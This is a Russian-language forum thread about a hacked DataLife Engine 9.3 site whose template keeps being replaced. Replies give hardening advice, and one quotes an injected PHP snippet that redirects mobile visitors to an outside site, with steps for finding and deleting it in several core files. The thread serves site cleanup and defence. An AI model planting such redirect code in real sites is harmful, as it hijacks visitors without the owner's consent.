ДД! версия дле 9.3. раз в месяц меняется шаблон на какуюто нелепость. пароли менял на фтп и все остальное... но всеравно меняется на левую херню (херня не моя а типа сайт другой) --- добавлено: 9 фев 2013 в 20:21 --- Подскажите как это действие прекратить ?
попробуйте прописать для всех папок права "только чтение" и похорошему бы скачать весь сайт и приверить на вирусы, касперыч у меня вирусы сразу нашел...
Первым делом НЕОБХОДИМО обновиться до актуальной версии DLE. Следить за заплатками от официального производителя. Если движок не нуленый, разработчики присылают заплатки на почту. Проверить сайт на вирусы. Отказаться от бестолковых, уязвимых модулей, или допиливать самому. Пароли использовать посложнее, с цифрами, заглавными буквами и тд... (возможно брутят)
проверь файлик с кофигурацией или файлик dbconfig.php Делаем следующее: 1. Открываем engine/data/config.php и dbconfig.php 2. Ищем такой код: $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone"); $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android"); $palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS"); $berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry"); $ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod"); if ($iphone || $android || $palmpre || $ipod || $berry === true) { header('Location: http://statuses.ws/'); } 3. Сносим к чертям собачьим. 4. Ищем engine/engine.php и там должно быть аж два подобных кода, кстати вставлены они у каждого в разные строчки, так что не буду называть точный номер. Сносим все это. 5. Ищем engine/init.php - там тоже все это убираем 6. В index.php такая штука тоже есть, тоже убираем.